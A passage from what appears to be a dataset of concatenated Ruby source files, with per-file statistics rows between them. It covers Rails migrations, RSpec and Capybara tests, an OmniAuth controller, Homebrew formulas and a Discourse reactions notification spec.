revisions.length.should == 10
revisions[0].id.should > oldest
end
it 'Gracefully handle non numeric revision IDs' do
visit(entries_url)
visit(Sections::Controller::Revisions.r(:restore, 'a').to_s)
page.current_path.should == entries_url
page.has_selector?('.message.error').should == true
end
it 'Restore a revision and delete newer revisions' do
visit(entries_url)
click_on(revisions_url)
within 'table tbody tr:last-child' do
click_on(restore_url)
end
page.has_selector?('.message.success').should == true
page.all('table tbody tr').count.should == 1
Sections::Model::SectionEntry[:title => 'Entry with revisions'] \
.revisions \
.length \
.should == 1
visit(entries_url)
click_on('Entry with revisions')
page.find_field(field.name).value.should == 'Modified 4'
end
it 'Compare array based values of two revisions' do
visit(entries_url)
click_on('Entry with revisions')
within '#section_entry_form' do
check("form_custom_field_value_#{field_1.id}_1")
click_on(save_button)
end
page.has_selector?('.message.error').should == false
visit(entries_url)
click_on(revisions_url)
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
choose("old_revision_id_#{revisions[-1].id}")
choose("new_revision_id_#{revisions[-2].id}")
click_on(compare_button)
page.has_selector?('.diff .ins').should == false
page.has_selector?('.diff .del').should == true
page.has_content?('yorick').should == true
page.has_content?('chuck').should == true
end
field.destroy
field_1.destroy
group.destroy
section.destroy
end
| 30.911017 | 82 | 0.635504 |
ac867b4c4c65257d37cbf467ab806f57ae0049e0 | 396 | class AddInstitutionsAndEvents < ActiveRecord::Migration[6.0]
def up
create_table(:institutions) do |t|
t.string :name
t.timestamps
end
create_table(:events) do |t|
t.string :name
t.string :type
t.datetime :date
t.belongs_to :institution
t.timestamps
end
end
def down
drop_table :institutions
drop_table :events
end
end
| 18 | 61 | 0.643939 |
1c25a1b909e86ba3f9c913d60f71c4ae176afe61 | 588 | class OmniauthController < ApplicationController
def google_oauth2
@user = User.create_from_provider_data(request.env['omniauth.auth'])
if @user.persisted?
sign_in_and_redirect @user
else
flash[:error] = 'There was a problem signing you in through Google. Please register or try again later.'
redirect_to new_user_registration_url
end
end
def failure
flash[:error] = "There was a problem signing you in. Please register or try signing in later."
redirect_to new_user_registration_url
end
end
| 32.666667 | 116 | 0.685374 |
87962392fc3fb5b7a3dba8005f40313cd3af8c4e | 549 | # Adds a very long max-age response header when the requested url
# looks like it includes a cache busting timestamp. Cache busting
# URLs look like this:
# http://HOST/PATH?DIGITS
#
# DIGITS is typically the number of seconds since some epoch but
# this can theoretically be any set of digits. Example:
# http://example.com/css/foo.css?7894387283
#
# rack-cache hook: runs whenever a response is fetched from the backend.
on :fetch do
  # Respect any explicit freshness headers the app already set.
  next if response.freshness_information?
  # assumes request.url is a single line, so $ is safe here (\z would be
  # the stricter anchor) — TODO confirm.
  if request.url =~ /\?\d+$/
    trace 'adding huge max-age to response for cache busting URL'
    # Effectively "cache forever": the digits in the query string change
    # whenever the asset changes, so a stale entry is never requested again.
    response.ttl = 100000000000000
  end
end
| 32.294118 | 65 | 0.737705 |
03eccb74a6f240c9ae622ef7a3986408148e6de4 | 228 | class User < ActiveRecord::Base
has_secure_password
has_many :tweets
def slug
username.gsub(" ", "-")
end
def self.find_by_slug(slug)
unslug = slug.gsub("-", " ")
self.find_by(username: unslug)
end
end
| 16.285714 | 34 | 0.649123 |
08fea6c0f08a3451e6bbf83c0f0e2c22987a1ac4 | 1,321 | class Unoconv < Formula
  desc "Convert between any document format supported by OpenOffice"
  homepage "http://dag.wiee.rs/home-made/unoconv/"
  url "http://dag.wieers.com/home-made/unoconv/unoconv-0.7.tar.gz"
  sha256 "56abbec55632b19dcaff7d506ad6e2fd86f53afff412e622cc1e162afb1263fa"
  head "https://github.com/dagwieers/unoconv.git"

  # Pre-built binary bottles, one checksum per supported OS release.
  bottle do
    cellar :any_skip_relocation
    sha256 "cead2876612e72e232f8abdb037329dc5f2f98b3665f723ff556369a6e3888c1" => :high_sierra
    sha256 "67de3e479604cf777e763c116a47793fda5791feaa322af1f2226dc7f0491ddf" => :sierra
    sha256 "432c15c1bab856edb94784c5849a120f6397d0198ec7e3acedff679f65f6841c" => :el_capitan
    sha256 "82e4120b114a941e5a099ca5ca3df12270f66795d8292a95d4164bcd3199edac" => :yosemite
    sha256 "db9fc7afd8681160e90f2e3de016e92bffe9d4d541cd70b50abe85b3c987f7d1" => :mavericks
    sha256 "a3894454d5da2486c89ae3b3745051144a6cedabb2777dfaac2f83230ece9e6d" => :x86_64_linux # glibc 2.19
    sha256 "ae47973f02b31408afac680814bfb26002714faded753a9c753c3ab28977572b" => :mountain_lion
  end

  # Snow Leopard and earlier ship a Python too old for unoconv.
  depends_on :python if MacOS.version <= :snow_leopard

  def install
    system "make", "install", "prefix=#{prefix}"
  end

  def caveats; <<~EOS
    In order to use unoconv, a copy of LibreOffice between versions 3.6.0.1 - 4.3.x must be installed.
  EOS
  end
end
| 44.033333 | 107 | 0.794095 |
1cd743aca9f7819c9e76a42d0ca3b19d645ffd60 | 177 | require 'test/unit'
class TypoTextfilterTextileAndMarkdownTest < Test::Unit::TestCase
  # Placeholder suite: flunk fails unconditionally so the build flags that
  # real coverage for the textile+markdown filter is still missing.
  def test_this_plugin
    flunk
  end
end
| 19.666667 | 66 | 0.734463 |
62714b3d5fbe8ec67d6b6d690da4348ac1d7bb9f | 10,852 | # frozen_string_literal: true
require 'rails_helper'
require_relative '../fabricators/reaction_fabricator.rb'
require_relative '../fabricators/reaction_user_fabricator.rb'
describe DiscourseReactions::ReactionNotification do
before do
SiteSetting.discourse_reactions_enabled = true
PostActionNotifier.enable
end
fab!(:post_1) { Fabricate(:post) }
fab!(:thumbsup) { Fabricate(:reaction, post: post_1, reaction_value: 'thumbsup') }
fab!(:user_1) { Fabricate(:user) }
fab!(:user_2) { Fabricate(:user) }
fab!(:user_3) { Fabricate(:user) }
fab!(:reaction_user1) { Fabricate(:reaction_user, reaction: thumbsup, user: user_1) }
fab!(:like_reaction) { Fabricate(:reaction, post: post_1, reaction_value: 'heart') }
it 'does not create notification when user is muted' do
MutedUser.create!(user_id: post_1.user.id, muted_user_id: user_1.id)
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(0)
end
it 'does not create notification when topic is muted' do
TopicUser.create!(
topic: post_1.topic,
user: post_1.user,
notification_level: TopicUser.notification_levels[:muted]
)
MutedUser.create!(user_id: post_1.user.id, muted_user_id: user_1.id)
described_class.new(thumbsup, user_1).create
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(0)
end
it 'does not create notification when notification setting is never' do
post_1.user.user_option.update!(
like_notification_frequency:
UserOption.like_notification_frequency_type[:never]
)
MutedUser.create!(user_id: post_1.user.id, muted_user_id: user_1.id)
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(0)
end
it 'correctly creates notification when notification setting is first time and daily' do
post_1.user.user_option.update!(
like_notification_frequency:
UserOption.like_notification_frequency_type[:first_time_and_daily]
)
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(1)
expect(Notification.last.user_id).to eq(post_1.user.id)
expect(Notification.last.notification_type).to eq(Notification.types[:reaction])
expect(JSON.parse(Notification.last.data)['original_username']).to eq(user_1.username)
user_2 = Fabricate(:user)
Fabricate(:reaction_user, reaction: thumbsup, user: user_2)
expect { described_class.new(thumbsup, user_2).create }.to change { Notification.count }.by(0)
freeze_time(Time.zone.now + 1.day)
cry = Fabricate(:reaction, post: post_1, reaction_value: 'cry')
Fabricate(:reaction_user, reaction: cry, user: user_2)
expect { described_class.new(cry, user_2).create }.to change { Notification.count }.by(1)
end
it 'deletes notification when all reactions are removed' do
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(1)
cry = Fabricate(:reaction, post: post_1, reaction_value: 'cry')
Fabricate(:reaction_user, reaction: cry, user: user_1)
expect { described_class.new(cry, user_1).create }.to change { Notification.count }.by(0)
user_2 = Fabricate(:user)
Fabricate(:reaction_user, reaction: cry, user: user_2)
expect { described_class.new(cry, user_1).create }.to change { Notification.count }.by(0)
expect(JSON.parse(Notification.last.data)['display_username']).to eq(user_1.username)
DiscourseReactions::ReactionUser.find_by(reaction: cry, user: user_1).destroy
DiscourseReactions::ReactionUser.find_by(reaction: thumbsup, user: user_1).destroy
expect do
described_class.new(cry, user_1).delete
described_class.new(thumbsup, user_1).delete
end.to change { Notification.count }.by(0)
expect(JSON.parse(Notification.last.data)['display_username']).to eq(user_2.username)
expect(Notification.last.notification_type).to eq(Notification.types[:reaction])
DiscourseReactions::ReactionUser.find_by(reaction: cry, user: user_2).destroy
expect { described_class.new(cry, user_2).delete }.to change { Notification.count }.by(-1)
end
it 'adds the heart icon when the remaining notification is a like' do
Fabricate(:reaction_user, reaction: like_reaction, user: user_2)
described_class.new(like_reaction, user_2).create
DiscourseReactions::ReactionUser.find_by(reaction: thumbsup, user: user_1).destroy!
described_class.new(thumbsup, user_1).delete
remaining_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(remaining_notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
it "doesn't add the heart icon when not all remaining notifications are likes" do
Fabricate(:reaction_user, reaction: like_reaction, user: user_2)
described_class.new(like_reaction, user_2).create
cry = Fabricate(:reaction, post: post_1, reaction_value: 'cry')
Fabricate(:reaction_user, reaction: cry, user: user_3)
described_class.new(cry, user_3).create
DiscourseReactions::ReactionUser.find_by(reaction: thumbsup, user: user_1).destroy!
described_class.new(thumbsup, user_1).delete
remaining_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(remaining_notification.data_hash[:reaction_icon]).to be_nil
end
describe 'consolidating reaction notifications' do
fab!(:post_2) { Fabricate(:post, user: post_1.user) }
let!(:cry_p1) { Fabricate(:reaction, post: post_1, reaction_value: 'cry') }
let!(:cry_p2) { Fabricate(:reaction, post: post_2, reaction_value: 'cry') }
describe 'multiple reactions from the same user' do
before do
SiteSetting.notification_consolidation_threshold = 1
end
it 'consolidates notifications from the same user' do
described_class.new(cry_p1, user_2).create
described_class.new(cry_p2, user_2).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(1)
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:consolidated]).to eq(true)
expect(consolidated_notification.data_hash[:username]).to eq(user_2.username)
end
it "doesn't update a consolidated notification when a different user reacts to a post" do
described_class.new(cry_p1, user_2).create
described_class.new(cry_p2, user_2).create
described_class.new(cry_p2, user_3).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(2)
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:consolidated]).to be_nil
expect(consolidated_notification.data_hash[:display_username]).to eq(user_3.username)
end
it 'keeps the reaction icon when consolidating multiple likes from the same user' do
like_reaction_p2 = Fabricate(:reaction, post: post_2, reaction_value: 'heart')
described_class.new(like_reaction, user_2).create
described_class.new(like_reaction_p2, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:consolidated]).to eq(true)
expect(consolidated_notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
it "doesn't add the reaction icon when consolidating a non-like and a like notification" do
described_class.new(cry_p2, user_2).create
described_class.new(like_reaction, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:reaction_icon]).to be_nil
end
it 'removes the reaction icon when updating a like consolidated notification with a different reactions' do
like_reaction_p2 = Fabricate(:reaction, post: post_2, reaction_value: 'heart')
post_3 = Fabricate(:post, user: post_1.user)
cry_p3 = Fabricate(:reaction, post: post_3, reaction_value: 'cry')
described_class.new(like_reaction, user_2).create
described_class.new(like_reaction_p2, user_2).create
described_class.new(cry_p3, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:reaction_icon]).to be_nil
end
end
describe 'multiple users reacting to the same post' do
before do
post_1.user.user_option.update!(
like_notification_frequency:
UserOption.like_notification_frequency_type[:always]
)
end
it 'keeps one notification pointing to the two last users that reacted to a post' do
described_class.new(cry_p1, user_2).create
described_class.new(thumbsup, user_3).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(1)
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:username2]).to eq(user_2.username)
expect(consolidated_notification.data_hash[:display_username]).to eq(user_3.username)
end
it 'creates a new notification if the last one was created more than one day ago' do
first_notification = described_class.new(cry_p1, user_2).create
first_notification.update!(created_at: 2.days.ago)
described_class.new(thumbsup, user_3).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(2)
end
it 'keeps the icon of the last notification' do
described_class.new(thumbsup, user_3).create
described_class.new(like_reaction, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
end
end
describe 'stores the icon in the notification payload' do
it 'stores the heart icon for like reactions' do
described_class.new(like_reaction, user_2).create
notification = Notification.where(user: post_1.user, notification_type: Notification.types[:reaction]).last
expect(notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
end
end
| 45.405858 | 118 | 0.740048 |
798edc0e8423bd11a40db6dff961af1a0c2f0870 | 1,730 | require 'rails_helper'
RSpec.describe Api::V0::NewsletterSubscriptionsController, :type => :controller do
describe "POST create" do
before(:each) do
stub_request(:post, "https://us8.api.mailchimp.com/2.0/lists/subscribe.json").
to_return(:status => 200, :body => "", :headers => {})
end
context "with correct parameters" do
let(:newsletter_subscription_attributes) { attributes_for(:newsletter_subscription) }
it "renders 201" do
post 'create', newsletter_subscription: {email: newsletter_subscription_attributes[:email], active: newsletter_subscription_attributes[:active]}, format: :json
expect(response.status).to eq(201)
end
it "creates new subscription" do
newsletter_subscription_count = NewsletterSubscription.count
post 'create', newsletter_subscription: {email: newsletter_subscription_attributes[:email], active: newsletter_subscription_attributes[:active]}, format: :json
expect(NewsletterSubscription.count).to be(newsletter_subscription_count + 1)
end
it "renders newsletter subscription" do
post 'create', newsletter_subscription: {email: newsletter_subscription_attributes[:email], active: newsletter_subscription_attributes[:active]}, format: :json
expect(JSON.parse(response.body)).to eq("newsletter_subscription"=>{"email"=>newsletter_subscription_attributes[:email], "active"=>true})
end
end
context "with incorrect parameters" do
it "renders 400" do
post 'create', newsletter_subscription: {not_email_param: "[email protected]", not_active_param: true}, :format => :json
expect(response.status).to eq(400)
end
end
end
end
| 41.190476 | 167 | 0.717341 |
91f4840f84fd321007d9a7e61190795628a7f20e | 233 | class C80AlbumGalleryAddPreviewToProps < ActiveRecord::Migration
def change
add_column :c80_album_gallery_props, :thumb_preview_width, :integer
add_column :c80_album_gallery_props, :thumb_preview_height, :integer
end
end
| 33.285714 | 72 | 0.824034 |
abb69fd20ca58582eab23ba9120930399a958468 | 652 | module Gemfury
module Const
class << self
def host
'www.gemfury.com'
#'localhost:3000'
end
def welcome
"Welcome to Gemfury!\nPlease complete the following information"
end
def email_error
"Invalid email address. Please try again."
end
def email_regex
return @email_regex if @email_regex
email_name_regex = '[A-Z0-9_\.%\+\-\']+'
domain_head_regex = '(?:[A-Z0-9\-]+\.)+'
domain_tld_regex = '(?:[A-Z]{2,4}|museum|travel)'
@email_regex = /^#{email_name_regex}@#{domain_head_regex}#{domain_tld_regex}$/i
end
end
end
end
| 24.148148 | 87 | 0.578221 |
330aa04310290b475986083fb907b28da7f058b5 | 3,112 | # frozen_string_literal: true
require "rspec"
require "rspec/expectations"
require "capybara"
require "capybara/rspec" # Required here instead of in rspec_spec to avoid RSpec deprecation warning
require "capybara/spec/test_app"
require "nokogiri"
# Alias be_truthy/be_falsey if not already defined to be able to use in RSpec 2 and 3
unless RSpec::Matchers.method_defined?(:be_truthy)
RSpec::Matchers.module_eval do
alias be_truthy be_true
alias be_falsey be_false
alias be_falsy be_false
end
end
module Capybara
module SpecHelper
class << self
def configure(config)
config.filter_run_excluding :requires => method(:filter).to_proc
config.before { Capybara::SpecHelper.reset! }
config.after { Capybara::SpecHelper.reset! }
# Test in 3.5+ where metadata doesn't autotrigger shared context inclusion - will be only behavior in RSpec 4
config.shared_context_metadata_behavior = :apply_to_host_groups if RSpec::Core::Version::STRING.to_f >= 3.5
end
def reset!
Capybara.app = TestApp
Capybara.app_host = nil
Capybara.default_selector = :xpath
Capybara.default_max_wait_time = 1
Capybara.ignore_hidden_elements = true
Capybara.exact = false
Capybara.exact_options = false
Capybara.raise_server_errors = true
Capybara.visible_text_only = false
Capybara.match = :smart
Capybara.wait_on_first_by_default = false
Capybara.enable_aria_label = false
end
def filter(requires, metadata)
if requires and metadata[:capybara_skip]
requires.any? do |require|
metadata[:capybara_skip].include?(require)
end
else
false
end
end
def spec(name, options={}, &block)
@specs ||= []
@specs << [name, options, block]
end
def run_specs(session, name, options={})
specs = @specs
RSpec.describe Capybara::Session, name, options do
include Capybara::SpecHelper
include Capybara::RSpecMatchers
before do
@session = session
end
after do
@session.reset_session!
end
specs.each do |spec_name, spec_options, block|
describe spec_name, spec_options do
class_eval(&block)
end
end
end
end
end # class << self
def silence_stream(stream)
old_stream = stream.dup
stream.reopen(RbConfig::CONFIG['host_os'] =~ /rmswin|mingw/ ? 'NUL:' : '/dev/null')
stream.sync = true
yield
ensure
stream.reopen(old_stream)
end
def quietly
silence_stream(STDOUT) do
silence_stream(STDERR) do
yield
end
end
end
def extract_results(session)
expect(session).to have_xpath("//pre[@id='results']")
YAML.load Nokogiri::HTML(session.body).xpath("//pre[@id='results']").first.inner_html.lstrip
end
end
end
Dir[File.dirname(__FILE__) + "/session/**/*.rb"].each { |file| require_relative file }
| 29.923077 | 117 | 0.638175 |
6257ba5b73de54af121a5e4d4b7a55a70501dd65 | 6,727 | require 'sequel_postgresql_triggers'
Sequel.migration do
up do
extension :pg_triggers
create_table(:std_fruit_size_counts, ignore_index_errors: true) do
primary_key :id
foreign_key :commodity_id, :commodities, null: false
foreign_key :uom_id, :uoms, null: false
String :size_count_description
String :marketing_size_range_mm
String :marketing_weight_range
String :size_count_interval_group
Integer :size_count_value, null: false
Integer :minimum_size_mm
Integer :maximum_size_mm
Integer :average_size_mm
Float :minimum_weight_gm
Float :maximum_weight_gm
Float :average_weight_gm
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique [:commodity_id, :size_count_value]
index [:commodity_id], name: :fki_std_fruit_size_counts_commodities
end
pgt_created_at(:std_fruit_size_counts,
:created_at,
function_name: :pgt_std_fruit_size_counts_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:std_fruit_size_counts,
:updated_at,
function_name: :pgt_std_fruit_size_counts_set_updated_at,
trigger_name: :set_updated_at)
create_table(:basic_pack_codes, ignore_index_errors: true) do
primary_key :id
String :basic_pack_code, null: false
String :description
Integer :length_mm
Integer :width_mm
Integer :height_mm
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique :basic_pack_code, name: :basic_pack_codes_unique_code
end
pgt_created_at(:basic_pack_codes,
:created_at,
function_name: :pgt_basic_pack_codes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:basic_pack_codes,
:updated_at,
function_name: :pgt_basic_pack_codes_set_updated_at,
trigger_name: :set_updated_at)
create_table(:standard_pack_codes, ignore_index_errors: true) do
primary_key :id
foreign_key :basic_pack_code_id, :basic_pack_codes
String :standard_pack_code, null: false
String :description
String :std_pack_label_code
BigDecimal :material_mass, null: false
TrueClass :use_size_ref_for_edi, default: false
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique :standard_pack_code, name: :standard_pack_codes_unique_code
end
pgt_created_at(:standard_pack_codes,
:created_at,
function_name: :pgt_standard_pack_codes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:standard_pack_codes,
:updated_at,
function_name: :pgt_standard_pack_codes_set_updated_at,
trigger_name: :set_updated_at)
create_table(:fruit_actual_counts_for_packs, ignore_index_errors: true) do
primary_key :id
foreign_key :std_fruit_size_count_id, :std_fruit_size_counts, null: false
foreign_key :basic_pack_code_id, :basic_pack_codes, null: false
column :standard_pack_code_ids, 'integer[]'
column :size_reference_ids, 'integer[]'
Integer :actual_count_for_pack, null: false
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique [:std_fruit_size_count_id, :basic_pack_code_id], name: :fruit_actual_counts_for_packs_idx
index [:std_fruit_size_count_id], name: :fki_fruit_actual_counts_for_packs_std_fruit_size_counts
index [:basic_pack_code_id], name: :fki_fruit_actual_counts_for_packs_basic_pack_codes
index [:standard_pack_code_id], name: :fki_fruit_actual_counts_for_packs_standard_pack_codes
end
pgt_created_at(:fruit_actual_counts_for_packs,
:created_at,
function_name: :pgt_fruit_actual_counts_for_packs_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:fruit_actual_counts_for_packs,
:updated_at,
function_name: :pgt_fruit_actual_counts_for_packs_set_updated_at,
trigger_name: :set_updated_at)
create_table(:fruit_size_references, ignore_index_errors: true) do
primary_key :id
foreign_key :fruit_actual_counts_for_pack_id, :fruit_actual_counts_for_packs, null: false
String :size_reference, null: false
String :edi_out_code
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique [:size_reference], name: :fruit_size_references_idx
end
pgt_created_at(:fruit_size_references,
:created_at,
function_name: :pgt_fruit_size_references_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:fruit_size_references,
:updated_at,
function_name: :pgt_fruit_size_references_set_updated_at,
trigger_name: :set_updated_at)
end
down do
drop_trigger(:fruit_size_references, :set_created_at)
drop_function(:pgt_fruit_size_references_set_created_at)
drop_trigger(:fruit_size_references, :set_updated_at)
drop_function(:pgt_fruit_size_references_set_updated_at)
drop_table(:fruit_size_references)
drop_trigger(:fruit_actual_counts_for_packs, :set_created_at)
drop_function(:pgt_fruit_actual_counts_for_packs_set_created_at)
drop_trigger(:fruit_actual_counts_for_packs, :set_updated_at)
drop_function(:pgt_fruit_actual_counts_for_packs_set_updated_at)
drop_table(:fruit_actual_counts_for_packs)
drop_trigger(:standard_pack_codes, :set_created_at)
drop_function(:pgt_standard_pack_codes_set_created_at)
drop_trigger(:standard_pack_codes, :set_updated_at)
drop_function(:pgt_standard_pack_codes_set_updated_at)
drop_table(:standard_pack_codes)
drop_trigger(:basic_pack_codes, :set_created_at)
drop_function(:pgt_basic_pack_codes_set_created_at)
drop_trigger(:basic_pack_codes, :set_updated_at)
drop_function(:pgt_basic_pack_codes_set_updated_at)
drop_table(:basic_pack_codes)
drop_trigger(:std_fruit_size_counts, :set_created_at)
drop_function(:pgt_std_fruit_size_counts_set_created_at)
drop_trigger(:std_fruit_size_counts, :set_updated_at)
drop_function(:pgt_std_fruit_size_counts_set_updated_at)
drop_table(:std_fruit_size_counts)
end
end
| 42.04375 | 102 | 0.718894 |
382187dac186c8faf44c0ddbda0b707a9177dd70 | 1,016 | class Shellharden < Formula
desc "Bash syntax highlighter that encourages/fixes variables quoting"
homepage "https://github.com/anordal/shellharden"
url "https://github.com/anordal/shellharden/archive/v4.1.tar.gz"
sha256 "2714b827f72c336b7abf87f5a291ec182443a5479ec3eee516d6e04c81d56414"
bottle do
sha256 "23a4338547c6cb9b3e4e8d454cb8e1420c5a38f0440b9dde0f95384656ef87ca" => :mojave
sha256 "1dc1515f934b43e17b4faeb17cda61a22a28866e625d863c7372eda6a2e111d3" => :high_sierra
sha256 "2fdb7e3d8fdeab4089143e5d11f1b5b379f25b11623af5497cd54e829ccd1b85" => :sierra
sha256 "d1b2430ab2de01134b5a0b4435fb7280bed7f140e662d7e2ccd4764a5be6e737" => :el_capitan
end
depends_on "rust" => :build
def install
system "cargo", "install", "--root", prefix, "--path", "."
end
test do
(testpath/"script.sh").write <<~EOS
dog="poodle"
echo $dog
EOS
system bin/"shellharden", "--replace", "script.sh"
assert_match "echo \"$dog\"", (testpath/"script.sh").read
end
end
| 35.034483 | 93 | 0.748031 |
03695441cf86f3d29b83458a3f2be4fb8e292422 | 735 | src_filename = ::File.basename(node['nginx']['openssl_source']['url'])
src_filepath = "#{Chef::Config['file_cache_path']}/#{src_filename}"
extract_path = "#{Chef::Config['file_cache_path']}/openssl-#{node['nginx']['openssl_source']['version']}"
remote_file src_filepath do
source node['nginx']['openssl_source']['url']
not_if { ::File.exist?(src_filepath) }
end
bash 'extract_openssl' do
cwd ::File.dirname(src_filepath)
code <<-EOH
mkdir -p #{extract_path}
tar xzf #{src_filename} -C #{extract_path}
mv #{extract_path}/*/* #{extract_path}/
EOH
not_if { ::File.exist?(extract_path) }
end
node.run_state['nginx_configure_flags'] = node.run_state['nginx_configure_flags'] | ["--with-openssl=#{extract_path}"]
| 35 | 118 | 0.697959 |
08c02bc2d9549cf84e77c51eda8dd8af9d7ddf4a | 556 | module Sip2
module Responses
#
# Sip2 Patron Information
#
class PatronInformation < BaseResponse
register_response_code 64
def patron_valid?
boolean 'BL'
end
def authenticated?
boolean 'CQ'
end
def email
text 'BE'
end
def location
text 'AQ'
end
def screen_message
text 'AF'
end
private
def attributes_for_inspect
%i[patron_valid? authenticated? email location screen_message]
end
end
end
end
| 15.027027 | 70 | 0.573741 |
e265b0ff54f2735e22041afb418d5433ef961309 | 1,138 | require 'waffle_api/errors'
require 'net/http'
require 'openssl'
require 'json'
require 'uri'
module WaffleAPI
# List of helpers used in WaffleAPI
module Helpers
NOT_FOUND_ERROR = 'Invalid BTC Address!'
INVALIDATION_TIME = 30 # Seconds
def call_uri
URI "#{WAFFLEPOOL_URL}#{WAFFLEPOOL_API_PATH}?address=#{@address}"
end
def request_json
response = Net::HTTP.get_response call_uri
fail Error::EndPointMoved if response.is_a? Net::HTTPNotFound
json = JSON.parse response.body
fail Error::AddressNotFound, @address if json['error'] == NOT_FOUND_ERROR
fail Error::UnknownError, json['error'] unless json['error'].empty?
json.delete 'error'
json
end
def data_recent?
@retrieved_at && @retrieved_at > Time.now - INVALIDATION_TIME
end
def data_recent!
@retrieved_at = Time.now
end
def stats(key, force_update = false)
@datas ||= []
if !data_recent? || force_update
@datas = request_json
data_recent!
end
fail Error::UnknownKey, key if @datas[key].nil?
@datas[key]
end
end
end
| 22.76 | 79 | 0.656415 |
5dca89cd47c12a8c251202c756996b52122a00a9 | 961 | require 'csv'
module SphyGmo
ErrorInfo = Struct.new('ErrorInfo', :code, :info, :message) do |s|
class << s
attr_accessor :all
def parse(v)
v = v.send(:error_info) if v.respond_to?(:error_info)
infos = case v
when Hash
v['ErrInfo'].split('|')
when String
[v]
when Array
v
else
raise ArgumentError.new("#{self} cannot parse #{v.inspect}")
end
infos.map{|code| self[code]}
end
def [](code)
all.fetch(code)
end
def all
@all ||= init_all
end
private
def init_all
all = {}
CSV
.foreach(SphyGmo.path_to_resources 'assets/gmo_error_codes.csv')
.map{|row| ErrorInfo.new(*row).freeze }
.each{|err| all[err.info] = err }
all.freeze
end
end
end
end
| 21.840909 | 78 | 0.471384 |
915c5b517840b414eb1063cac24cbce577dfbc81 | 336 | class Store < ActiveRecord::Base
before_save(:fix)
has_many :brands_stores # points to join table
has_many :brands, through: :brands_stores # links
validates(:name, {:uniqueness => true, :presence => true, :length => { :maximum => 100 }})
private
def fix
self.name=self.name.capitalize
end
end
| 22.4 | 92 | 0.645833 |
f7a687f4739292a69fad3a7c85cd798684d148a3 | 1,973 | module ActiveRecord
module Reflection
class AssociationReflection #:nodoc:
def reverse_for?(klass)
reverse_matches_for(klass).empty? ? false : true
end
attr_writer :reverse
def reverse
if @reverse.nil? and not self.options[:polymorphic]
reverse_matches = reverse_matches_for(self.class_name.constantize) rescue nil
# grab first association, or make a wild guess
@reverse = reverse_matches.blank? ? false : reverse_matches.first.name
end
@reverse
end
protected
def reverse_matches_for(klass)
reverse_matches = []
# stage 1 filter: collect associations that point back to this model and use the same primary_key_name
klass.reflect_on_all_associations.each do |assoc|
# skip over has_many :through associations
next if assoc.options[:through]
next unless assoc.options[:polymorphic] or assoc.class_name.constantize == self.active_record
case [assoc.macro, self.macro].find_all{|m| m == :has_and_belongs_to_many}.length
# if both are a habtm, then match them based on the join table
when 2
next unless assoc.options[:join_table] == self.options[:join_table]
# if only one is a habtm, they do not match
when 1
next
# otherwise, match them based on the primary_key_name
when 0
next unless assoc.primary_key_name.to_sym == self.primary_key_name.to_sym
end
reverse_matches << assoc
end
# stage 2 filter: name-based matching (association name vs self.active_record.to_s)
reverse_matches.find_all do |assoc|
self.active_record.to_s.underscore.include? assoc.name.to_s.pluralize.singularize
end if reverse_matches.length > 1
reverse_matches
end
end
end
end
| 34.614035 | 112 | 0.633046 |
e94c1343904b07ebe3a2aa62f5be8606f8338deb | 9,487 | require 'test_helper'
module Synapse
module UnitOfWork
class UnitOfWorkTest < Test::Unit::TestCase
def setup
@provider = UnitOfWorkProvider.new
@uow = UnitOfWork.new @provider
end
def teardown
if @provider.started?
raise 'Unit of work was not properly cleared from the provider'
end
end
should 'raise an exception if the unit is started twice' do
@uow.start
assert_raises RuntimeError do
@uow.start
end
@uow.rollback
end
should 'raise an exception if a commit is requested but the unit is not started' do
assert_raises RuntimeError do
@uow.commit
end
end
should 'keep an identity map for aggregates of the same type and identifier' do
aggregate_a = TestAggregateA.new 1
aggregate_b = TestAggregateB.new 2
aggregate_c = TestAggregateB.new 3
aggregate_d = TestAggregateB.new 3
event_bus = Object.new
storage_callback = lambda {}
assert_same aggregate_a, @uow.register_aggregate(aggregate_a, event_bus, &storage_callback)
assert_same aggregate_b, @uow.register_aggregate(aggregate_b, event_bus, &storage_callback)
assert_same aggregate_c, @uow.register_aggregate(aggregate_c, event_bus, &storage_callback)
